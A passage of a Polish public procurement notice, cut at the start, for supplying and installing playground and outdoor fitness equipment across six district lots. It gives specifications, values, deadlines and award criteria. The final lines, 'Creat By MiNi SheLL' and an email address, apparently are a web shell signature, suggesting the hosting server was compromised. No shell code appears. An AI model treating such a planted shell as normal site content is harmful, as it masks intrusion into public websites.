przedłużenie terminu realizacji umowy o tyle dni, ile trwało wstrzymanie robót ze względu na wystąpienie warunków atmosferycznych uniemożliwiających realizację przedmiotu zamówienia z zachowaniem reżimu technologicznego,3)	przedłużenie terminu realizacji umowy o tyle dni, ile trwało wstrzymanie robót ze względu na konieczność wydania decyzji lub postanowień wstrzymujących realizację montażu przez instytucje niezależne, takie jak: PINB, Policja, PSP, Sanepid itp.2.	Podstawą przedłużenia terminu umownego jest pisemne zgłoszenie przez Wykonawcę lub Zamawiającego konieczności przerwania robót montażowych wraz ze wskazaniem przyczyny ich wstrzymania. Przedłużenie terminu nastąpi w oparciu o aneks do umowy. Podstawą sporządzenia aneksu do umowy notatka Zamawiającego, w której potwierdzi okoliczności opisane w ust. 1.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-11-08</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Wykonawca jest zobowiązany do udzielenia minimum 36-miesięcznej gwarancji na zabudowane urządzenia. W ramach gwarancji Wykonawca dokonuje okresowych przeglądów (potwierdzonych protokołem) raz w roku. Serwisowanie urządzeń musi być zgodne z wymaganiami producenta zabudowanych urządzeń.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Żurawiej dz. BOGUSZOWICE OSIEDLE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonawca dostarczy i zamontuje urządzenia zabawowe na istniejącym placu zabaw przy ul. Żurawiej dz. BOGUSZOWICE OSIEDLEWYKAZ URZĄDZEŃ STANOWIĄCYCH PRZEDMIOT ZAMÓWIENIA:KARUZELA- konstrukcja stalowa umieszczona na platformie z blachy o nawierzchni antypoślizgowej o średnicy 1,3-1,5 m- kierownica do wprawiania karuzeli w ruch z rury stalowej o średnicy 20-30 mm- minimum 5 miejsc- poręcze / oparcie zabezpieczające przed upadkiem wykonane z rur stalowych, osadzonych w platformie - siedziska z kolorowych płyt	- wymagane fundamentowanieHUŚTAWKA PODWÓJNA- jedno siedzisko z oparciem i zamknięciem łańcuszkowym, gumowe (dla dzieci młodszych)- jedno siedzisko bez oparcia (dla dzieci starszych)- siedziska zawieszone na łańcuchach - tulejki teflonowe- szerokość 3,0-3,5 m- wysokość 2,4-2,6 m- wymagane fundamentowanie ZESTAW ZABAWOWY ZE ZJEŻDŻALNIĄ- podest linowy (tzw. ,,bocianie gniazdo") o powierzchni ok. 0,8 m usytuowany na wysokości ok. 1,0 m- zjeżdżalnia ze stali nierdzewnej o długości ok. 2,0 m- drabinki wejściowe linowe, stanowiące dodatkowy element zabawy zręcznościowej- wymagane fundamentowanie BUJAKI SPRĘŻYNOWE- konstrukcja kołysząca ze sprężyny stalowej o średnicy ok. 20 cm i wysokości ok. 40 cm- dwa różne wzory, np.: pojazd i zwierzę- wymagane fundamentowanieŁAWKI- prosta konstrukcja stalowa- siedziska i oparcia ze sztywnych listew z tworzywa sztucznego- długość ok. 1,8 m- 2 ławki z oparciami- 2 ławki bez oparć- wymagane fundamentowanieREGULAMIN- konstrukcja stalowa- tablica o wymiarach ok. 0,5 x 0,7 m- tekst regulaminu wykonany w trwałej technice (odpornej na warunki atmosferyczne i promieniowanie UV)- treść i forma graficzna do zaakceptowania przez Zamawiającego - wymagane fundamentowanie<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37410000-5, 37535200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 34400,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 112<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Montaż</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw przy ul. Partyzantów, dz. LIGOTA-LIGOCKA KUŹNIA</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonawca dostarczy i zamontuje urządzenia zabawowe na istniejącym placu zabaw przy ul. Partyzantów, dz. LIGOTA-LIGOCKA KUŹNIAWYKAZ URZĄDZEŃ STANOWIĄCYCH PRZEDMIOT ZAMÓWIENIA:LINARIUM- linarium obrotowe (możliwość wspinaczki i zabawy jak na karuzeli) - wysokość 2,0-2,5 m- średnica 1,8-2,2 m - wymagane fundamentowaniePIASKOWNICA- piaskownica o konstrukcji betonowej, okrągła- siedzisko z płyt HPL / HDPE na całym obwodzie- średnica 2,7-3,2 m- wysokość ok. 40 cm<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37410000-5, 37535200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 24350,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 112<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Montaż</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Maroko-Nowiny kulturalnie i sportowo" przy ul. H. M. Góreckiego, dz. MAROKO-NOWINY</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonawca dostarczy i zamontuje urządzenia zabawowe oraz urządzenia siłowni terenowej w ramach projektu ,,Maroko-Nowiny kulturalnie i sportowo" przy ul. H. M. Góreckiego, dz. MAROKO-NOWINYWYKAZ URZĄDZEŃ STANOWIĄCYCH PRZEDMIOT ZAMÓWIENIA:GRY INTERAKTYWNE- plansze do gier podwórkowych wykonane z kolorowej masy termoplastycznej na bazie żywicy syntetycznej, instalowane na nawierzchni asfaltowej - 3 różne wzory: np. gra w chińczyka, gra w klasy (potrójne pola), labirynt 3 różnokolorowych tras, każda o długości ok. 5,0 m (do gry w kapsle, skakania, wyścigów modeli zdalnie sterowanych)- powierzchnia każdej z gier minimum 12,0 m2HUŚTAWKA WAGOWA- huśtawka pojedyncza- długość min. 3,0 m- wysokość ok. 0,5 m- siedziska z płyt HPL / HDPE- uchwyty przy siedziskach- odbojnice gumowe w gruncie pod siedziskami- wymagane fundamentowanieBUJAKI SPRĘŻYNOWE- konstrukcja kołysząca ze sprężyny stalowej o średnicy ok. 20 cm i wysokości ok. 40 cm- dwa różne wzory, np.: pojazd i zwierzę- wymagane fundamentowanieURZĄDZENIA SIŁOWNI TERENOWEJ- 6 urządzeń do ćwiczeń na wolnym powietrzu, w tym: 2 urządzenia montowane na stanowiskach pojedynczych i 4 urządzenia montowane jako podwójne na wspólnym słupie / pylonie - potoczne nazwy urządzeń montowanych jako pojedyncze: narciarz biegowy i wioślarz- potoczne nazwy urządzeń montowanych na stanowiskach podwójnych: wahadło, jeździec, pajacyk / nożyce, poręcze (do wzmacniania mięśni ramion i brzucha) - każde urządzenie musi być wyposażone w tabliczkę (wykonaną w trwałej technice odpornej na warunki atmosferyczne) z nazwą urządzenia i instrukcją wykonywania ćwiczeń - wymagane fundamentowanieKOSZE NA ŚMIECI- konstrukcja stalowa- daszek na pojemnikiem- pojemność 35-40 litrówŁAWKI Z OPARCIEM- konstrukcja stalowa z rur o średnicy min. 75 mm- siedziska i oparcia drewniane- długość ok. 1,8 m- wymagane fundamentowanieNAWIERZCHNIA Z BRUKU BETONOWEGO- nawierzchnia z bruku typu ,,holland" o gr. 6 cm (uzupełnienie przestrzeni pomiędzy już zainstalowanymi nawierzchniami pod urządzeniami)- zakończenie ,,wolnych" boków obrzeżami betonowymi 8x30 cm - bruk kolorowy<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37410000-5, 37535200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 49300,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 112<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Montaż</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Dostawa i montaż urządzeń zabawowych oraz urządzeń do ćwiczeń w ramach projektu ,,Spotkajmy się w dobrej formie!", dz. RYBNICKA KUŹNIA</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonawca dostarczy i zamontuje urządzenia zabawowe oraz urządzenia do ćwiczeń w ramach projektu ,,Spotkajmy się w dobrej formie!", dz. RYBNICKA KUŹNIAWYKAZ URZĄDZEŃ STANOWIĄCYCH PRZEDMIOT ZAMÓWIENIA:ZESTAW WIELOFUNKCYJNY DO ĆWICZEŃ- zestaw składający się z minimum 6 elementów o różnym przeznaczeniu bądź minimum 6 odrębnych urządzeń do ćwiczeń- na całość składa się: ławeczka skośna z uchwytami do nóg i rąk, drabinka pozioma o długości min. 2,0 m, drabinka pionowa o wysokości minimum 2,0 m dwa drążki poziome zamontowane na różnych wysokościach (np. 1,8 i 2,2 m) i poręcze (do wzmacniania mięśni ramion i brzucha) - potoczna nazwa zestawu: ,,ścieżka zdrowia"- rozmieszczenie elementów na powierzchni ok. 20 m2- wymagane fundamentowanie<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37410000-5, 37535200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 23570,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 112<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Montaż</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Dostawa i montaż urządzeń zabawowych na istniejącym placu zabaw na terenie ZSP10 w ramach projektu ,,Ćwiczymy i myślimy przy tym zdrowo się bawimy!", dz. SMOLNA</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonawca dostarczy i zamontuje urządzenia zabawowe na istniejącym placu zabaw na terenie ZSP10 w ramach projektu ,,Ćwiczymy i myślimy przy tym zdrowo się bawimy!", dz. SMOLNAWYKAZ URZĄDZEŃ STANOWIĄCYCH PRZEDMIOT ZAMÓWIENIA:STOŁY DO GRY W TENISA STOŁOWEGO- powierzchnia blatów z betonu z kruszywa ozdobnego, szlifowana i lakierowana- podpory betonowe do wkopania- wymiary: 274x152 cm, wysokość 76 cm- imitacja siatki z perforowanej blachy ze stali nierdzewnejSTÓŁ DO GRY W SZACHY- powierzchnia blatu z betonu z kruszywa ozdobnego, szlifowana i lakierowana- blat z dwoma planszami do gry w szachy- zestaw składający się ze stolika i 2 ławek z oparciami- podpory betonowe do wkopania- długość całego zestawu: min. 1,8 m- szerokość całego zestawu: ok. 1,8 m- szerokość stolika: ok. 0,8 m- wysokość blatu stolika: 76 cm<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37410000-5, 37535200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 13820,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 112<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Montaż</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Dostawa i montaż urządzeń zabawowych oraz urządzeń siłowni terenowej w ramach projektu ,,Uatrakcyjnienie placu przyszkolnego na terenie Szkoły Podstawowej nr 12", dz. ZEBRZYDOWICE</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonawca dostarczy i zamontuje urządzenia zabawowe oraz urządzenia siłowni terenowej w ramach projektu ,,Uatrakcyjnienie placu przyszkolnego na terenie Szkoły Podstawowej nr 12", dz. ZEBRZYDOWICEWYKAZ URZĄDZEŃ STANOWIĄCYCH PRZEDMIOT ZAMÓWIENIA:URZĄDZENIA SIŁOWNI TERENOWEJ- 3 urządzenia do ćwiczeń na wolnym powietrzu, montowane jako stanowiska pojedyncze - potoczne nazwy urządzeń: wyciskanie siedząc, biegacz, pajacyk / nożyce - każde urządzenie musi być wyposażone w tabliczkę (wykonaną w trwałej technice odpornej na warunki atmosferyczne) z nazwą urządzenia i instrukcją wykonywania ćwiczeń - wymagane fundamentowanieSTOŁY DO GRY W TENISA STOŁOWEGO- powierzchnia blatów z betonu z kruszywa ozdobnego, szlifowana i lakierowana- podpory betonowe do wkopania- wymiary: 274x152 cm, wysokość 76 cm- imitacja siatki z perforowanej blachy ze stali nierdzewnej<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>37410000-5, 37535200-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 14220,00<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 112<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Montaż</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com